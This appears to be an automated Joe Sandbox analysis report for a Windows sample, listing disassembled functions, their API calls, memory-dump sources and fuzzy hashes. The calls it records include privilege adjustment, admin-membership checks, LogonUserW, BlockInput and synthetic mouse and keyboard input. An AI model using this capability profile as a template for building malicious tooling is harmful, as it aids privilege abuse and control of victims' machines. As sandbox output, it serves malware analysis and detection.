Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 551ad7769e3b2dc6b29f3fa5d9114f38651efb3415299b9530e166b1cac5df93
Instruction ID: fd70e25c4e945f9cfdddad938ed74cfdea7afa942c49515ed44faa0491777c77
Opcode Fuzzy Hash: 551ad7769e3b2dc6b29f3fa5d9114f38651efb3415299b9530e166b1cac5df93
Instruction Fuzzy Hash: 3C41EA71504209BFEB219E94CC84FBFB7FCEB80714F04406EF285AA190EA759E4197A0

Function 0102E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0102E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0102E2B4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 0d22ede474149edd7c3686478d328acad3ea23cfc5320563ab2acbf497d36b38
Instruction ID: f920a05d37bee6fe5aae6628688804515544ca5d0a3bcc0809102c72acc66524
Opcode Fuzzy Hash: 0d22ede474149edd7c3686478d328acad3ea23cfc5320563ab2acbf497d36b38
Instruction Fuzzy Hash: 25216D35A00118EFDB00EFA5D894EEDBBB8FF49310F0484A9E985AB351DB759905CB50

Function 0101B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FFF4EA: std::exception::exception.LIBCMT ref: 00FFF51E
Part of subcall function 00FFF4EA: __CxxThrowException@8.LIBCMT ref: 00FFF533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101B1AD
GetLastError.KERNEL32 ref: 0101B1BA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 0394fbe4b6f60f8dc549b848751f4065ecbd14e2ed77813565d3239e3b0cd0a3
Instruction ID: 0fb625d59a046643a83a169ab205ac25fe8f127e27565653048543833c3370ea
Opcode Fuzzy Hash: 0394fbe4b6f60f8dc549b848751f4065ecbd14e2ed77813565d3239e3b0cd0a3
Instruction Fuzzy Hash: D711BCB2500205AFE3289FA8DC85D6BBBFCEF44710B21852EF59693250DB78FC418B60

Function 010271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01027223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0102723A
FreeSid.ADVAPI32(?), ref: 0102724A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c15bf5f655c50700c67c61a2180054f0073aa305735c4899d6274444d40f54a6
Instruction ID: 4653959276add699df834c1a584683e189234049833c1a03c4119564346eec31
Opcode Fuzzy Hash: c15bf5f655c50700c67c61a2180054f0073aa305735c4899d6274444d40f54a6
Instruction Fuzzy Hash: D2F01D76A00209BFEF04DFE4D999AEEBBB8EF08201F504469F642E2191E27596548B10

Function 01027513 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 01027547

Strings

DOWN, xrefs: 0102752C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: d86b08d42f28962c49e16165ba1b94732643d047c6c167dd2892c3eec07b146e
Instruction ID: 84a36042dbf9ad5929f357383daafd3c88eece95c5f3520960fa48dc2b0e61e8
Opcode Fuzzy Hash: d86b08d42f28962c49e16165ba1b94732643d047c6c167dd2892c3eec07b146e
Instruction Fuzzy Hash: 94E086A228D77238F94531597C02EF7238C8F32131B10014AF8E4E44C5ED845D81526A

Function 0102F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0102F599
FindClose.KERNEL32(00000000), ref: 0102F5C9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e93e7d7c87599756771176d271a722d2bb2dcbc4225cc70bc7450b2d2ec23eb1
Instruction ID: 2c37407e1055afa1833e3c56f43b69112d36266001d55352d43cb003a5faf24f
Opcode Fuzzy Hash: e93e7d7c87599756771176d271a722d2bb2dcbc4225cc70bc7450b2d2ec23eb1
Instruction Fuzzy Hash: BA11C0326006159FD710EF29D844A2EB3E8FF88324F00891EF9A9DB391CB74A9008B91

Function 0102CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0103BE6A,?,?,00000000,?), ref: 0102CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0103BE6A,?,?,00000000,?), ref: 0102CEB9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 648195a252034f46a2feea154370ff08ffa19896a65d1ed2a3e4e0dd0c9fbeea
Instruction ID: d30663299b5583c1df73fadbec56d9f9ce4c31a44e41ec167b2da34e6be8bc89
Opcode Fuzzy Hash: 648195a252034f46a2feea154370ff08ffa19896a65d1ed2a3e4e0dd0c9fbeea
Instruction Fuzzy Hash: CFF0823110023AABEB209AA5DC48FEE776DBF08365F008156F999D6181D6349A40CBA0

Function 0102411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 01024153
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 01024166

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1ebf16d0ed4fe8db033ab66e81d2ee0d4771b9647ea56e5ff81c263d57acbcf7
Instruction ID: b0aceac318da8de054042b10ad609864659d4476f4efd33dbb36b812b792285d
Opcode Fuzzy Hash: 1ebf16d0ed4fe8db033ab66e81d2ee0d4771b9647ea56e5ff81c263d57acbcf7
Instruction Fuzzy Hash: A7F09A70A0034DAFEB058FA4C805BBE7FB4EF04305F00800AF9A6A6192D779C612CFA4

Function 0101AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0101ACC0), ref: 0101AB99
CloseHandle.KERNEL32(?,?,0101ACC0), ref: 0101ABAB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5166940660ff90f52dcf3f3c98297982479a06b24e917ed87327a407b80201e4
Instruction ID: d3d38597f718855476d8e99c020c0d758d9d8e2e5c03edd3bf6ab4adac7f626b
Opcode Fuzzy Hash: 5166940660ff90f52dcf3f3c98297982479a06b24e917ed87327a407b80201e4
Instruction Fuzzy Hash: 91E08635000520EFF7212F54EC04D737BE9EF003207188829F5D981434C7275C90DB50

Function 010081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,01006DB3,-0000031A,?,?,00000001), ref: 010081B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 010081BA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d3f5b9f946b0fb08532841757b39f4ca3abe596ac8615f17ccc68c3247b39ab0
Instruction ID: 29c25251f99fd9d0a89b04e8537a9a961f048db150d04adda6b6e3bddf29f5f0
Opcode Fuzzy Hash: d3f5b9f946b0fb08532841757b39f4ca3abe596ac8615f17ccc68c3247b39ab0
Instruction Fuzzy Hash: 7FB09271244618ABDB102BE2E809B587F68EB08652F008010F68D440658B7754109B95

Function 00FE77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FE7921

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: bd09e75fc97740e6d1c1fe0207f8d971e7dfb9e0117b175a5d20ab18acddb2b8
Instruction ID: 33f6f875fe7a4416bddb58d0df6d0cb460e2cb855d94c368a36bdc800f152ab6
Opcode Fuzzy Hash: bd09e75fc97740e6d1c1fe0207f8d971e7dfb9e0117b175a5d20ab18acddb2b8
Instruction Fuzzy Hash: 43A27B71E04259CFDB24DF59C8807ADBBB1FF48310F2581A9E899AB391D7349A81DF90

Function 00FF3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00FF4176

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 9db742594047f46a98f4032718c50af37b8d49e2f0e6c19a9f76c28a20d490b6
Instruction ID: 9b7ff2692b937f443d67480a578f5bdf2dbe82bd2ba3ef0ee2b6da885d4fcbbf
Opcode Fuzzy Hash: 9db742594047f46a98f4032718c50af37b8d49e2f0e6c19a9f76c28a20d490b6
Instruction Fuzzy Hash: A172CE75E0020D9FDF14DF98C880ABEB7B5EF48310F148069EE45AB2A1D735AE45EB91

Function 0100D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c026772381f74c0560691d902bf33d860afbeb3d35aa5ee69f938a0f1de25a3f
Instruction ID: 96eab2dc0bccc93f1556fce87a689cdff5bd4abf50e43b0c5f1a53fb4cb6c977
Opcode Fuzzy Hash: c026772381f74c0560691d902bf33d860afbeb3d35aa5ee69f938a0f1de25a3f
Instruction Fuzzy Hash: 3D325531D29F014DE7639578C922336A689EFB72C4F15D727F859B59DAEB2AC0C34210

Function 00FE96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 2a4d4eb0681124f077b3fdef198c019e22966b3d561a4ab9507f9e726889bc9e
Instruction ID: 71565b5b23576b1aa2d6875181852436fd88dbc6c43c8ae5d74f5c3d2a31d5dc
Opcode Fuzzy Hash: 2a4d4eb0681124f077b3fdef198c019e22966b3d561a4ab9507f9e726889bc9e
Instruction Fuzzy Hash: 3722DD715083419FE764DF15C880B6FB7E4BF84710F00492DF99A8B2A1DBB4E944DBA2

Function 0101038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3ca5719be9755608420261e72bf3d936337365a8c3177ca408e33b2371558ed
Instruction ID: 49d8148794320796f08c852bdac3071d422298c74a470120f66c1fc20d61b9ab
Opcode Fuzzy Hash: b3ca5719be9755608420261e72bf3d936337365a8c3177ca408e33b2371558ed
Instruction Fuzzy Hash: 2CB1C130D2AF414DD22395398831336B65CBFBB2D5F91D71BFC9A74D5AEB2685834280

Function 0102B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0102B6DF

Part of subcall function 0100344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0102BDC3,00000000,?,?,?,?,0102BF70,00000000,?), ref: 01003453
Part of subcall function 0100344A: __aulldiv.LIBCMT ref: 01003473

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 5927ef18707523392bb04c992a178d6893002767ab21768412316a346da440bb
Instruction ID: eb37033f2ae1a8b1254032a8c5305b63161bfbe9137e7490957553f37676f1dc
Opcode Fuzzy Hash: 5927ef18707523392bb04c992a178d6893002767ab21768412316a346da440bb
Instruction Fuzzy Hash: 24217F766345118BC72ACF28C491A92F7E1FB99310B648E6DE4E5CF2C0CA78B905DB54

Function 01036AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 01036ACA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ec1306156161e5cffff7aa6561877cace33d488eafb832bc9cdc92ee5be6d30f
Instruction ID: d7ad68fee8b6cd5bea1a149d20cf1d4aaa84789c67a0391481630a988dbb3054
Opcode Fuzzy Hash: ec1306156161e5cffff7aa6561877cace33d488eafb832bc9cdc92ee5be6d30f
Instruction Fuzzy Hash: C2E048353102046FC740EF9AD804D5AB7ECAFA8751F04C456FA85C7391DAF5F8048B90

Function 0101B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0101AD3E), ref: 0101B124

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 9501cc0be0a75c7894e33110e0391290afb98ea91f08dce7d103d8f2dbb77792
Instruction ID: 65b3e733f1fa21f8bab4654a7238ebbc33fc8047a9e411ec639012b1535ae045
Opcode Fuzzy Hash: 9501cc0be0a75c7894e33110e0391290afb98ea91f08dce7d103d8f2dbb77792
Instruction Fuzzy Hash: 79D05E321A464EAEEF024EA4DC02EAE3F6AEB04700F408110FA51C50A0C676D531AB50

Function 0105B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0105B352

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 3bb1739bc98cb4a90a7f6194637c0b5958de2b06082e26e4091a191d4afadf87
Instruction ID: 59e3368b33e1ec91ce1f7760a05ac5b00d5968257ecefd1e7c9bef4c338491dc
Opcode Fuzzy Hash: 3bb1739bc98cb4a90a7f6194637c0b5958de2b06082e26e4091a191d4afadf87
Instruction Fuzzy Hash: 7EC04CB150010DDFD751CBC0C944AEFB7BCAB04301F104191E185F2110D7749B458B71

Function 01008189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0100818F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: abde6726fdf57ff137aa12d95acbe363640c0e869c0422a7413859f799f4213e
Instruction ID: e572f8ef95cee76af2b35dfe2eb3bb16b55dded8470b8ab514ac178613111153
Opcode Fuzzy Hash: abde6726fdf57ff137aa12d95acbe363640c0e869c0422a7413859f799f4213e
Instruction Fuzzy Hash: 8DA0113000020CAB8F002A82E8088883F2CEA002A0B008020F88C000208B23A820AB80

Function 00FF3200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
